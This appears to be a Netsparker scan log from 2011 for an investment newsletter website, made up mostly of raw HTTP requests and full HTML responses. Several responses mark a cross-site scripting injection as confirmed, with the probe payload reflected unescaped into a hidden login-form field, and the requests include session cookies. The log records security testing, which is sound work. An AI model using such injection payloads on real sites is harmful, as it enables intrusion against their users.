</DIV>
</DIV></TD>
</TR>
</TBODY>
</TABLE>
<table width="800" border="0" align="center" cellpadding="0" cellspacing="0" id="main">
<tr>
<td align="left" valign="top"><font color="#666666" size="1" face="Verdana, Arial, Helvetica, sans-serif">&copy;2011 Stansberry & Associates Investment Research. All Rights Reserved. Protected by copyright laws of the United States and international treaties. This website may only be used pursuant to the subscription agreement and any reproduction, copying, or redistribution (electronic or otherwise, including on the world wide web), in whole or in part, is strictly prohibited without the express written permission of Stansberry & Associates Investment Research, LLC. 1217 Saint Paul Street, Baltimore MD 21202. </font> </td>
</tr>
</table>
<table width="800" align="center" cellpadding="0" cellspacing="0" bgcolor="#FFFFFF" id="main">
<tr>
<td height="21" align="left" valign="top"><div align="center">
<div align="center">
<div align="left">
<DIV align=left>
<DIV align=left>
<hr width="800" size="1" noshade>
</DIV>
</DIV>
</div>
</div>
</div></td>
</tr>
</table>
<table width="800" align="center" cellpadding="0" cellspacing="0">
<tr>
<td align="left" valign="top"><div align="center">
<p><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/">Home</a> | <a href="/editors.asp">Meet the Editors</a> | <a href="/news.asp">News & Events</a> | <a href="http://www.stansberryresearch.com/pub/psi/free_reports.html" target="_blank">Media &amp; Interviews</a> | <a href="/schedule.asp">Publishing Schedule</a> | <a href="/contact.asp">Contact Us</a> | <a href="/customer_service.asp">Customer Service</a><a href="/privacy.asp"><br>
</a> <a href="/pub/pal">The S&A Alliance</a> | <a href="/pub/sug">True Wealth Alliance</a> | <a href="/pub/pwa">Private Wealth Alliance</a> <br>
<a href="/pub/digest/">S&amp;A Digest</a> | <a href="http://www.dailywealth.com" target="_blank" title="DailyWealth Investment Newsletter">DailyWealth</a> | <a href="http://www.growthstockwire.com" target="_blank" title="Growth Stock Wire Investment Newsletter">Growth Stock Wire</a> | <a href="http://www.thedailycrux.com/" target="_blank">The Daily Crux<br />
</a></font><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/privacy.asp">Privacy Policy</a><br>
</font></p>
</div></td>
</tr>
</table>
<table width="800" align="center" cellpadding="0" cellspacing="0" bgcolor="#FFFFFF" id="main">
<tr>
<td height="21" align="left" valign="top"><div align="center">
<div align="center">
<div align="left">
<DIV align=left>
<DIV align=left>
<hr align="center" width="300" size="1" noshade>
</DIV>
</DIV>
</div>
</div>
</div></td>
</tr>
</table>
<table width="800" align="center" cellpadding="0" cellspacing="0" bgcolor="#FFFFFF">
<tr>
<td height="21" align="left" valign="top"><div align="center"><a href="/"><strong><img src="/images/sa_logo.gif" alt="Stansberry & Associates Investment Research" width="198" height="39" border="0"></strong></a></div></td>
</tr>
</table>
<script type="text/javascript">
var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));
</script>
<script type="text/javascript">
var pageTracker = _gat._getTracker("UA-235360-4");
pageTracker._initData();
pageTracker._trackPageview();
</script>

<!-- Google Code for S&amp;A Remarketing List -->
<script type="text/javascript">
/* <![CDATA[ */
var google_conversion_id = 1068007774;
var google_conversion_language = "en";
var google_conversion_format = "3";
var google_conversion_color = "666666";
var google_conversion_label = "AVdACPaJ0QEQ3oKi_QM";
var google_conversion_value = 0;
/* ]]> */
</script>
<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
<noscript>
<div style="display:inline;">
<img height="1" width="1" style="border-style:none;" alt="" src="http://www.googleadservices.com/pagead/conversion/1068007774/?label=AVdACPaJ0QEQ3oKi_QM&amp;guid=ON&amp;script=0"/>
</div>
</noscript>
<!-- Advertiser 'Stansberry & Associates', Include user in segment '2011 DWP - Stansberry Retargeting Pixel' - DO NOT MODIFY THIS PIXEL IN ANY WAY -->
<img src="http://ads.bluelithium.com/pixel?id=1539896&t=2" width="1" height="1" />
<!-- End of segment tag -->
</body>
</html>

Identification Response

HTTP/1.1 200 OK
Date: Fri, 04 Nov 2011 05:45:24 GMT
Server: Microsoft-IIS/6.0
P3P: CP="UNI STA NAV COM INT DELi CUR TAI NON COR BUS DSP"
X-Powered-By: ASP.NET
Content-Length: 23007
Content-Type: text/html
Cache-control: private



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>The S&A FDA Report</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<meta name="description" content="The FDA Investment Research Report uses FDA approvable letters to predict investment opportunities in the healthcare industry.">
<meta name="keywords" content="fda approvable letter, pharmaceutical investment, biotech investing, patent investment, pharmaceutical investing, pharmaceutical industry investment, pharmaceutical investment research, life sciences investment">
<meta name="copyright" content=" �2008 Stansberry & Associates Investment Research ">
<meta name="ROBOTS" content="ALL">
<link rel="stylesheet" href="/includes/css.css" type="text/css" />
</head>

<body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<SCRIPT LANGUAGE="JavaScript" src="http://oascentral.stansberryresearch.com/Scripts/oas_analytics.js"></SCRIPT>
<script language="JavaScript">
var RN = new String (Math.random());
var RNS = RN.substring (2,11);
var oas_jx_sitepage = "stansberry/pub/fda";
//<!�- Define Custom Reporting Taxonomy, format is: '&Attribute1=Value1&Attribute2=Value2' -->
var OAS_taxonomy='custom=' + oas_jx_sitepage;
var OAS_query='';
OAS_query += 'XE' + '&' + OAS_taxonomy + OAS_rdl + "&if_nt_CookieAccept=" + OAS_CA + '&XE';
// -->
</script>
<table width="800" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td width="427" rowspan="2"><a href="/"><img src="/images/top_logo.gif" alt="Stansberry & Associates Investment Research" width="427" height="103" border="0"></a></td>
<td width="360" height="82" align="right" valign="middle"><a href="http://signups.harborpublishing.com/fsm/signups/signup/538.html" target="_new"><img src="/images/stars_arrow.gif" border="0"></a></td>
<td width="13" align="right" valign="middle">&nbsp;</td>
</tr>
<tr>
<td colspan="2" align="right" valign="bottom"><table width="100%" border="0" align="center" cellpadding="3" cellspacing="0" class="top_font">
<tr>
<td align="right" valign="bottom"><div align="right">Customer Service: 1-888-261-2693 | <a href="/website_overview.asp" target="_blank">Website Overview</a></div></td>
<td width="6" align="right" valign="bottom">&nbsp;</td>
</tr>
</table></td>
</tr>
</table>
<table width="798" border="0" align="center" cellpadding="0" cellspacing="0">
<tr align="left" valign="top">
<td><div align="left"><a href="/"><img src="/images/home_button.gif" alt="Home" width="70" height="38" border="0"></a></div></td>
<td><div align="left"><a href="/editors.asp"><img src="/images/editors_button.gif" alt="Meet The Editors" width="129" height="38" border="0"></a></div></td>
<td><div align="left"><a href="/products.asp"><img src="/images/products_btn.gif" alt="In The News" width="112" height="38" border="0"></a></div></td>
<td><div align="left"><a href="/schedule.asp"><img src="/images/pubsched_button.gif" alt="Investment Research Publishing Schedule" width="155" height="38" border="0"></a></div></td>
<td><div align="left"><a href="/contact.asp"><img src="/images/contact_button_main.gif" alt="Contact Us" width="159" height="38" border="0"></a></div></td>
<td><div align="left"><img src="/images/login_button.gif" alt="Subscriber Login" width="173" height="38" border="0"></div></td>
</tr>
</table><script language="javascript" type="text/javascript">
// <!CDATA[

function Submit1_onclick() {

}

// ]]>
</script>



<table width="800" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td>
<table width="625" border="0" cellpadding="0" cellspacing="0">
<tr>
<td><script language="JavaScript">
<!--
var oas_jx_pos = "Top";
document.write("<scr" + "ipt language=\"JavaScript\" src=\"http://oascentral.stansberryresearch.com/RealMedia/ads/adstream_jx.ads/" +
oas_jx_sitepage + "/1" + RNS + "@" + oas_jx_pos + '?' + OAS_query + "\"></scr" + "ipt>");
// -->
</script></td>
</tr>
</table></td>
<td width="200" align="left" valign="middle"><table width="100%" border="0" cellpadding="5" cellspacing="0">
<tr>
<td><!--<form action="/ICA/Default.aspx" method="post">-->
<!-- <form action="/test1/Default.aspx" method="post">-->
<form action="/ICA/default.aspx" method="post">
<table width="100%" border="0" align="right" cellpadding="2" cellspacing="0" class="top_font">
<tr>
<td >User Name:
<input name="username" type="text" id="username" size="22"></td>
</tr>
<tr>
<td>Password:
<input name="password" type="password" id="password" size="22">
<input name="ref" type="hidden" value="/pub/digest/archive/2008/html/fda_essays/'"--></style></script><script>netsparker(0x002A72)</script>">
</td>
</tr>
<tr>
<td ><div align="left">
<p><input name="Submit" type="submit" class="top_font" value="Login" id="Submit1" onclick="return Submit1_onclick()">
<a href="/responses/forgot_password.asp">Forgot Password?</a></p>
</div></td>
</tr>
</table>
</form></td>
</tr>
</table></td>
</tr>
</table>
<table id=main cellspacing=0 cellpadding=3 width=800 align=center
bgcolor=#ffffff>
<tbody>
<tr>
<td valign=top align=left height=21><div align=center>
<div align=center>
<div align=left>
<div align=left>
<div align=left>
<hr align="center" width="775" size="1" noshade>
<div align="center"><font face="Verdana, Arial, Helvetica, sans-serif"
size=2></font></div>
</div>
</div>
</div>
</div>
</div></td>
</tr>
</tbody>
</table>
<table width="800" align="center" cellpadding="0" cellspacing="0" id="main">
<tr>
<td width="189" align="left" valign="top" bgcolor="#FFFFFF">
<table width="183" border="0" align="left" cellpadding="1" cellspacing="0">
<tr align="left" valign="top">
<td colspan="2"><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><strong><img src="/images/premium_sub_head.gif" alt="Premium Products" width="183" height="19"></strong></font></td>
</tr>
<tr align="left" valign="top">
<td width="2%">&nbsp;</td>
<td width="98%"><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/pub/trw/index.asp">True Wealth</a></font></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/pub/psi/index.asp">Stansberry's Investment Advisory</a></font></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/pub/oil/index.asp">S&A Resource Report</a></font></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/pub/btr/index.asp">Advanced Income</a></font></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/pub/twp/index.asp">The 12% Letter</a></font></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/pub/dil/index.asp">Phase 1 Investor</a></font></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/pub/evi/index.asp">Extreme Value</a></font></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/pub/shr/index.asp">S&A Short Report</a></font></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/pub/tin/index.asp">True Income</a></font></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/pub/rem/index.asp">Retirement Millionaire</a></font></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/pub/rtr/index.asp">Retirement Trader</a></font></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/pub/pst/index.asp">Penny Stock Specialist</a></font></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/pub/jrt/index.asp">Junior Resource Trader</a></font></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/pub/gra/index.asp">S&A Grail Trader</a></font></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/pub/tws/index.asp">True Wealth Systems</a></font></td>
</tr>

<tr align="left" valign="top">
<td width="2%"></td>
<td width="98%"><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/pub/digest/index.asp">The S&A Digest</a></font></td>
</tr>

<tr align="left" valign="top">
<td colspan="2"><img src="/images/white_fill.gif" width="1" height="1"></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="http://www.dailywealth.com" target="new window">DailyWealth</a></font></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="http://www.growthstockwire.com" target="new window">Growth Stock Wire</a></font></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="http://www.thedailycrux.com" target="new window">The Daily Crux</a></font></td>
</tr>
<tr align="left" valign="top">
<td colspan="2"><img src="/images/white_fill.gif" width="1" height="10"></td>
</tr>
<tr align="left" valign="top">
<td colspan="2"><strong><img src="/images/lifetime_sub_head.gif" alt="Lifetime Memberships" width="183" height="19"></strong></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/pub/pal/index.asp">The S&A Alliance</a></font></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/pub/pwa/index.asp">Private Wealth Alliance</a></font></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td>&nbsp;</td>
</tr>
</table>

</td>
<td width="1" bgcolor="#cccccc"><img src="1-1.gif" width="1"
height="1"></td>
<td width="9" align="left" valign="top" bgcolor="#FFFFFF"> <div align="left">
</div></td>
<td width="417" align="left" valign="top" bgcolor="#FFFFFF"><table width="100%" border="0" cellspacing="0" cellpadding="2">
<tr>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><img src="/images/fda_title_sm.gif" alt="S&A Dividend Grabber" width="370" height="34"></font></td>
</tr>
<tr>
<td align="left" valign="top"><p><font size="2" face="Verdana, Arial, Helvetica, sans-serif">The <em>S&amp;A FDA Report</em>, written by <a href="/editors.asp#huang">Dr. George Huang</a>, is a sophisticated trading service that pinpoints the precise..
- /pub/gld/index.asp

/pub/gld/index.asp CONFIRMED

Injection URL

http://www.stansberryresearch.com/responses/sign_in_error.asp

Injection Request

GET /responses/sign_in_error.asp HTTP/1.1
Referer: http://www.stansberryresearch.com/pub/digest/archive/2008/html/fda_essays.asp
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.stansberryresearch.com
Cookie: ASPSESSIONIDQACQTSTA=GEPNLMLBKNENIJCFCEJJFONJ; EOA+Scribble+Short+%2D+New+Style=EOA+Scribble+Short+%2D+New+Style; ASPSESSIONIDQSTBRQSC=HMFBMFABKIKCAIHLCIOCILBL
Accept-Encoding: gzip, deflate

Identification Request

GET /pub/gld/index.asp HTTP/1.1
Referer: http://www.stansberryresearch.com/sitemap.xml
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.stansberryresearch.com
Cookie: ASPSESSIONIDQACQTSTA=GEPNLMLBKNENIJCFCEJJFONJ; EOA+Scribble+Short+%2D+New+Style=EOA+Scribble+Short+%2D+New+Style; ASPSESSIONIDQSTBRQSC=HMFBMFABKIKCAIHLCIOCILBL
Accept-Encoding: gzip, deflate

Injection Response

HTTP/1.1 200 OK
Date: Fri, 04 Nov 2011 05:45:23 GMT
Server: Microsoft-IIS/6.0
P3P: CP="UNI STA NAV COM INT DELi CUR TAI NON COR BUS DSP"
X-Powered-By: ASP.NET
Content-Length: 12205
Content-Type: text/html
Cache-control: private



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>Stansberry & Associates Investment Research</title>
<link rel="stylesheet" href="/includes/css.css" type="text/css" />
</head>

<body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<SCRIPT LANGUAGE="JavaScript" src="http://oascentral.stansberryresearch.com/Scripts/oas_analytics.js"></SCRIPT>
<script language="JavaScript">
var RN = new String (Math.random());
var RNS = RN.substring (2,11);
var oas_jx_sitepage = "stansberry/cover";
//<!�- Define Custom Reporting Taxonomy, format is: '&Attribute1=Value1&Attribute2=Value2' -->
var OAS_taxonomy='custom=' + oas_jx_sitepage;
var OAS_query='';
OAS_query += 'XE' + '&' + OAS_taxonomy + OAS_rdl + "&if_nt_CookieAccept=" + OAS_CA + '&XE';
// -->
</script>
<table width="800" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td width="427" rowspan="2"><a href="/"><img src="/images/top_logo.gif" alt="Stansberry & Associates Investment Research" width="427" height="103" border="0"></a></td>
<td width="360" height="82" align="right" valign="middle"><a href="http://signups.harborpublishing.com/fsm/signups/signup/538.html" target="_new"><img src="/images/stars_arrow.gif" border="0"></a></td>
<td width="13" align="right" valign="middle">&nbsp;</td>
</tr>
<tr>
<td colspan="2" align="right" valign="bottom"><table width="100%" border="0" align="center" cellpadding="3" cellspacing="0" class="top_font">
<tr>
<td align="right" valign="bottom"><div align="right">Customer Service: 1-888-261-2693 | <a href="/website_overview.asp" target="_blank">Website Overview</a></div></td>
<td width="6" align="right" valign="bottom">&nbsp;</td>
</tr>
</table></td>
</tr>
</table>
<table width="798" border="0" align="center" cellpadding="0" cellspacing="0">
<tr align="left" valign="top">
<td><div align="left"><a href="/"><img src="/images/home_button.gif" alt="Home" width="70" height="38" border="0"></a></div></td>
<td><div align="left"><a href="/editors.asp"><img src="/images/editors_button.gif" alt="Meet The Editors" width="129" height="38" border="0"></a></div></td>
<td><div align="left"><a href="/products.asp"><img src="/images/products_btn.gif" alt="In The News" width="112" height="38" border="0"></a></div></td>
<td><div align="left"><a href="/schedule.asp"><img src="/images/pubsched_button.gif" alt="Investment Research Publishing Schedule" width="155" height="38" border="0"></a></div></td>
<td><div align="left"><a href="/contact.asp"><img src="/images/contact_button_main.gif" alt="Contact Us" width="159" height="38" border="0"></a></div></td>
<td><div align="left"><img src="/images/login_button.gif" alt="Subscriber Login" width="173" height="38" border="0"></div></td>
</tr>
</table><script language="javascript" type="text/javascript">
// <!CDATA[

function Submit1_onclick() {

}

// ]]>
</script>



<table width="800" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td>
<table width="625" border="0" cellpadding="0" cellspacing="0">
<tr>
<td><script language="JavaScript">
<!--
var oas_jx_pos = "Top";
document.write("<scr" + "ipt language=\"JavaScript\" src=\"http://oascentral.stansberryresearch.com/RealMedia/ads/adstream_jx.ads/" +
oas_jx_sitepage + "/1" + RNS + "@" + oas_jx_pos + '?' + OAS_query + "\"></scr" + "ipt>");
// -->
</script></td>
</tr>
</table></td>
<td width="200" align="left" valign="middle"><table width="100%" border="0" cellpadding="5" cellspacing="0">
<tr>
<td><!--<form action="/ICA/Default.aspx" method="post">-->
<!-- <form action="/test1/Default.aspx" method="post">-->
<form action="/ICA/default.aspx" method="post">
<table width="100%" border="0" align="right" cellpadding="2" cellspacing="0" class="top_font">
<tr>
<td >User Name:
<input name="username" type="text" id="username" size="22"></td>
</tr>
<tr>
<td>Password:
<input name="password" type="password" id="password" size="22">
<input name="ref" type="hidden" value="/pub/digest/archive/2008/html/fda_essays/'"--></style></script><script>netsparker(0x002A72)</script>">
</td>
</tr>
<tr>
<td ><div align="left">
<p><input name="Submit" type="submit" class="top_font" value="Login" id="Submit1" onclick="return Submit1_onclick()">
<a href="/responses/forgot_password.asp">Forgot Password?</a></p>
</div></td>
</tr>
</table>
</form></td>
</tr>
</table></td>
</tr>
</table>
<TABLE id=main cellSpacing=0 cellPadding=3 width=800 align=center
bgColor=#ffffff>
<TBODY>
<TR>
<TD vAlign=top align=left height=21><DIV align=center>
<DIV align=center>
<DIV align=left>
<DIV align=left>
<DIV align=left>
<hr align="center" width="775" size="1" noshade>
<div align="center"><FONT face="Verdana, Arial, Helvetica, sans-serif"
size=2></FONT></div>
</DIV>
</DIV>
</DIV>
</DIV>
</DIV></TD>
</TR>
</TBODY>
</TABLE>
<table width="800" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td>

<div align="center">
<P align=center class="mid_font"><B>Please Log In </B></P>
<table width="42%" border="0" cellspacing="0" cellpadding="2">
<tr align="left" valign="top">
<td><u><span class="mid_font"><FONT color=#990000><FONT
color=#666666><font color="#000000"><B>Remember:</B></font></FONT></FONT></span></u></td>
</tr>

</table>
<P align=center class="mid_font">You must have an S&amp;A subscription to access this section. <BR>
To learn more about our publications, visit our <a href="/">home page</a>. </P>
<P align=center class="mid_font">If you are already a subscriber, check your user name and password and try logging in again. <br>
Or contact customer service at 1-888-261-2693.<font color="#FF0000"><strong> </strong></font></P>
<P align=center class="mid_font">Thank you.</P>
<P align=center class="mid_font"><FONT color=#990000><B><FONT
color=#666666><BR>
</FONT></B></FONT></P>
</div>

</td>
</tr>
</table>
<TABLE cellSpacing=0 cellPadding=3 width=800 align=center
bgColor=#ffffff>
<TBODY>
<TR>
<TD vAlign=top align=left height=21><DIV align=center>
<DIV align=center>
<DIV align=left>
<DIV align=left>
<DIV align=left>
<div align="center"><FONT face="Verdana, Arial, Helvetica, sans-serif"
size=2><img src="/images/bottom_border.gif" width="798" height="24"></FONT></div>
</DIV>
</DIV>
</DIV>
</DIV>
</DIV></TD>
</TR>
</TBODY>
</TABLE>
<table width="800" border="0" align="center" cellpadding="0" cellspacing="0" id="main">
<tr>
<td align="left" valign="top"><font color="#666666" size="1" face="Verdana, Arial, Helvetica, sans-serif">&copy;2011 Stansberry & Associates Investment Research. All Rights Reserved. Protected by copyright laws of the United States and international treaties. This website may only be used pursuant to the subscription agreement and any reproduction, copying, or redistribution (electronic or otherwise, including on the world wide web), in whole or in part, is strictly prohibited without the express written permission of Stansberry & Associates Investment Research, LLC. 1217 Saint Paul Street, Baltimore MD 21202. </font> </td>
</tr>
</table>
<table width="800" align="center" cellpadding="0" cellspacing="0" bgcolor="#FFFFFF" id="main">
<tr>
<td height="21" align="left" valign="top"><div align="center">
<div align="center">
<div align="left">
<DIV align=left>
<DIV align=left>
<hr width="800" size="1" noshade>
</DIV>
</DIV>
</div>
</div>
</div></td>
</tr>
</table>
<table width="800" align="center" cellpadding="0" cellspacing="0">
<tr>
<td align="left" valign="top"><div align="center">
<p><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/">Home</a> | <a href="/editors.asp">Meet the Editors</a> | <a href="/news.asp">News & Events</a> | <a href="http://www.stansberryresearch.com/pub/psi/free_reports.html" target="_blank">Media &amp; Interviews</a> | <a href="/schedule.asp">Publishing Schedule</a> | <a href="/contact.asp">Contact Us</a> | <a href="/customer_service.asp">Customer Service</a><a href="/privacy.asp"><br>
</a> <a href="/pub/pal">The S&A Alliance</a> | <a href="/pub/sug">True Wealth Alliance</a> | <a href="/pub/pwa">Private Wealth Alliance</a> <br>
<a href="/pub/digest/">S&amp;A Digest</a> | <a href="http://www.dailywealth.com" target="_blank" title="DailyWealth Investment Newsletter">DailyWealth</a> | <a href="http://www.growthstockwire.com" target="_blank" title="Growth Stock Wire Investment Newsletter">Growth Stock Wire</a> | <a href="http://www.thedailycrux.com/" target="_blank">The Daily Crux<br />
</a></font><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/privacy.asp">Privacy Policy</a><br>
</font></p>
</div></td>
</tr>
</table>
<table width="800" align="center" cellpadding="0" cellspacing="0" bgcolor="#FFFFFF" id="main">
<tr>
<td height="21" align="left" valign="top"><div align="center">
<div align="center">
<div align="left">
<DIV align=left>
<DIV align=left>
<hr align="center" width="300" size="1" noshade>
</DIV>
</DIV>
</div>
</div>
</div></td>
</tr>
</table>
<table width="800" align="center" cellpadding="0" cellspacing="0" bgcolor="#FFFFFF">
<tr>
<td height="21" align="left" valign="top"><div align="center"><a href="/"><strong><img src="/images/sa_logo.gif" alt="Stansberry & Associates Investment Research" width="198" height="39" border="0"></strong></a></div></td>
</tr>
</table>
<script type="text/javascript">
var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));
</script>
<script type="text/javascript">
var pageTracker = _gat._getTracker("UA-235360-4");
pageTracker._initData();
pageTracker._trackPageview();
</script>

<!-- Google Code for S&amp;A Remarketing List -->
<script type="text/javascript">
/* <![CDATA[ */
var google_conversion_id = 1068007774;
var google_conversion_language = "en";
var google_conversion_format = "3";
var google_conversion_color = "666666";
var google_conversion_label = "AVdACPaJ0QEQ3oKi_QM";
var google_conversion_value = 0;
/* ]]> */
</script>
<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
<noscript>
<div style="display:inline;">
<img height="1" width="1" style="border-style:none;" alt="" src="http://www.googleadservices.com/pagead/conversion/1068007774/?label=AVdACPaJ0QEQ3oKi_QM&amp;guid=ON&amp;script=0"/>
</div>
</noscript>
<!-- Advertiser 'Stansberry & Associates', Include user in segment '2011 DWP - Stansberry Retargeting Pixel' - DO NOT MODIFY THIS PIXEL IN ANY WAY -->
<img src="http://ads.bluelithium.com/pixel?id=1539896&t=2" width="1" height="1" />
<!-- End of segment tag -->
</body>
</html>

Identification Response

HTTP/1.1 200 OK
Date: Fri, 04 Nov 2011 05:45:24 GMT
Server: Microsoft-IIS/6.0
P3P: CP="UNI STA NAV COM INT DELi CUR TAI NON COR BUS DSP"
X-Powered-By: ASP.NET
Content-Length: 23263
Content-Type: text/html
Cache-control: private



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>S&A Prospector Commodity Investment Report</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<meta name="description" content="The S&A Prospector Investment Research Report focuses on precious metals and opportunities in the global marketplace.">
<meta name="keywords" content="coal mining, mining stock, gold mining investment, mining company research, coal mine investment, mining investing, mining, gold mining stocks, mining stock, gold mining stock report, investment newsletter">
<meta name="copyright" content=" �2008 Stansberry & Associates Investment Research ">
<meta name="ROBOTS" content="ALL">
<link rel="stylesheet" href="/includes/css.css" type="text/css" />
</head>

<body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<SCRIPT LANGUAGE="JavaScript" src="http://oascentral.stansberryresearch.com/Scripts/oas_analytics.js"></SCRIPT>
<script language="JavaScript">
var RN = new String (Math.random());
var RNS = RN.substring (2,11);
var oas_jx_sitepage = "stansberry/pub/gld";
//<!�- Define Custom Reporting Taxonomy, format is: '&Attribute1=Value1&Attribute2=Value2' -->
var OAS_taxonomy='custom=' + oas_jx_sitepage;
var OAS_query='';
OAS_query += 'XE' + '&' + OAS_taxonomy + OAS_rdl + "&if_nt_CookieAccept=" + OAS_CA + '&XE';
// -->
</script>
<table width="800" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td width="427" rowspan="2"><a href="/"><img src="/images/top_logo.gif" alt="Stansberry & Associates Investment Research" width="427" height="103" border="0"></a></td>
<td width="360" height="82" align="right" valign="middle"><a href="http://signups.harborpublishing.com/fsm/signups/signup/538.html" target="_new"><img src="/images/stars_arrow.gif" border="0"></a></td>
<td width="13" align="right" valign="middle">&nbsp;</td>
</tr>
<tr>
<td colspan="2" align="right" valign="bottom"><table width="100%" border="0" align="center" cellpadding="3" cellspacing="0" class="top_font">
<tr>
<td align="right" valign="bottom"><div align="right">Customer Service: 1-888-261-2693 | <a href="/website_overview.asp" target="_blank">Website Overview</a></div></td>
<td width="6" align="right" valign="bottom">&nbsp;</td>
</tr>
</table></td>
</tr>
</table>
<table width="798" border="0" align="center" cellpadding="0" cellspacing="0">
<tr align="left" valign="top">
<td><div align="left"><a href="/"><img src="/images/home_button.gif" alt="Home" width="70" height="38" border="0"></a></div></td>
<td><div align="left"><a href="/editors.asp"><img src="/images/editors_button.gif" alt="Meet The Editors" width="129" height="38" border="0"></a></div></td>
<td><div align="left"><a href="/products.asp"><img src="/images/products_btn.gif" alt="In The News" width="112" height="38" border="0"></a></div></td>
<td><div align="left"><a href="/schedule.asp"><img src="/images/pubsched_button.gif" alt="Investment Research Publishing Schedule" width="155" height="38" border="0"></a></div></td>
<td><div align="left"><a href="/contact.asp"><img src="/images/contact_button_main.gif" alt="Contact Us" width="159" height="38" border="0"></a></div></td>
<td><div align="left"><img src="/images/login_button.gif" alt="Subscriber Login" width="173" height="38" border="0"></div></td>
</tr>
</table><script language="javascript" type="text/javascript">
// <!CDATA[

function Submit1_onclick() {

}

// ]]>
</script>



<table width="800" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td>
<table width="625" border="0" cellpadding="0" cellspacing="0">
<tr>
<td><script language="JavaScript">
<!--
var oas_jx_pos = "Top";
